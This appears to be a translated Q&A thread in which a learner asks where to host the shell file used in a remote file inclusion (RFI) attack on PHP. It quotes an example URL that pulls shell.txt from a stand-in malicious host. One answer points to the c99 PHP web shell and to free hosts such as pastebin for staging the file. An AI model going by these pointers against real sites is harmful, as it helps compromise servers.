所以我正在学习 RFI、LFI 并得到一个简单的问题。许多示例显示了如何需要将 PHP 文件插入页面以提取不同的信息。我的问题是我在哪里上传这个 .txt 文件?例如,您可以看到:
http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
这是为了我的学习,我搜索了很多,但无法弄清楚这个简单的事情。有专门的网站吗?
谢谢。
问问题
3312 次
2 回答
4
您将在一个废弃的俄罗斯服务器上上传这个文本文件,您可以通过 Tor 和被黑的匿名代理访问该服务器,从一个您不必注册到商店所有者并且没有日志记录的网吧,穿着您的风衣和山羊万圣节的面具。
谷歌搜索“c99 php shell”。
如果将 PHP 代码放在 txt 文件中,放入配置了 PHP 的服务器上的 php 文件中,它将在之前呈现。大约几年前,您可以通过 google 搜索网站并发现每页 5 个易受攻击的网站。PHP通过禁用远程文件包含include和其他安全增强来解决此问题。
在 99% 的服务器上,include('http://www.malicious.com/shell.txt');这是不可能的。
PHP 文件http://www.vulnerable.com/test.php?file=将是您想要破解的文件。
算了吧,...
对于测试,文件可以上传到任何地方,自由空间,你的本地服务器(谷歌:xampp,wampserver),谷歌驱动器,甚至你想要测试的站点,例如http://www.vulnerable.com/test.php?文件=http://www.vulnerable.com/shell.txt。
为简单起见,您也可以尝试 pastebin.com:http://pastebin.com/然后找到粘贴文本的原始链接,例如:http ://pastebin.com/raw.php?i= GK9m8dAL
于 2013-10-18T14:01:06.907 回答
1
如果我对您的理解正确:您所展示的只是一个示例。它表明 php 脚本“test.php”可能是一个漏洞,因为它可能被“shell.txt”(RFI)滥用。
“www.malicious.com”不是“真实”地址。
于 2013-10-18T13:54:09.250 回答